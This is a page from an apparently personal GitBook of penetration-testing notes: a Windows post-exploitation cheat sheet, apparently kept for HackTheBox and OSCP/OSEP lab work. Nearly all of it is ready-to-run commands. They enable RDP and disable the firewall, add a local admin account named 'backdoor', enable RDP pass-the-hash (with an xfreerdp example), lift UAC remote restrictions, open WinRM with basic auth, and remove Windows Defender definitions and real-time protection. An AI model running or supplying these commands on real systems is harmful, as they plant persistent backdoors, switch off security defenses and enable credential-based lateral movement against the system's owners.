Hack-notes
  • Whoami
  • MalDev
    • Reflective loader
  • Academy HackTheBox
    • Attacking Common Applications
      • Attacking Common Applications - Skills Assessment I
      • Attacking Common Applications - Skills Assessment II
      • Attacking Common Applications - Skills Assessment III
    • Attacking Common Services
      • Attacking Common Services - Easy
      • Attacking Common Services - Medium
      • Attacking Common Services - Hard
    • AD Enumeration & Attacks - Skills Assessment Part I
    • AD Enumeration & Attacks - Skills Assessment Part II
  • HackTheBox-writeups
    • Machines
      • Windows
        • Jab
      • Linux
        • ICLEAN
  • CheatSheet
    • AD
      • linux
      • Windows
      • Bloodhound cypher query
      • Powerview
    • Privilege Escalation
      • Linux
      • Windows
    • Payloads (Reverse shell)
    • Post-Exploitation
      • Windows
    • CLM and Applocker Bypass
  • Your Path to the OSCP+
  • Pwning OSEP with `secrets.txt` on my first attempt
Powered by GitBook
On this page
  • Enable rdp access
  • Add backdoor to local administrators group
  • Adding user to Remote management users
  • Turn off windows defender

Was this helpful?

  1. CheatSheet
  2. Post-Exploitation

Windows

Enable rdp access

enable terminal services

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f

disable firewall

netsh advfirewall set allprofiles state off

enabled rdp in one line command line

net user /add (Username) (Password) && net localgroup administrators (Username) /add & net localgroup "Remote Desktop Users" (Username) /add & netsh advfirewall firewall set rule group="remote desktop" new enable=Yes & reg add HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v (Username) /t REG_DWORD /d 0 & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v TSEnabled /t REG_DWORD /d 1 /f & sc config TermService start= auto

enable pass the hash in rdp

/reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

#pass the hash
xfreerdp /v:192.168.157.221 /u:backdoor /pth:"NTLM_hash" /dynamic-resolution /drive:linux,/opt

Add backdoor to local administrators group

net user backdoor Password1 /add
net localgroup administrators /add backdoor

disables UAC remote restrictions for local accounts, allowing full admin rights over remote connections like SMB and WMI.

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "LocalAccountTokenFilterPolicy" /t REG_DWORD /d 1 /f

Adding user to Remote management users

#enable winrm 
winrm quickconfig -force
winrm set winrm/config/service/auth '@{Basic="true"}'

#add user "test" to winrm group 
net localgroup "Remote Management Users" test /add

Turn off windows defender

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -removedefinitions -all

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1 /f

powershell -c "Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true"

#disable firewall
NetSh Advfirewall set allprofiles state off

PreviousPost-ExploitationNextCLM and Applocker Bypass

Last updated 21 days ago

Was this helpful?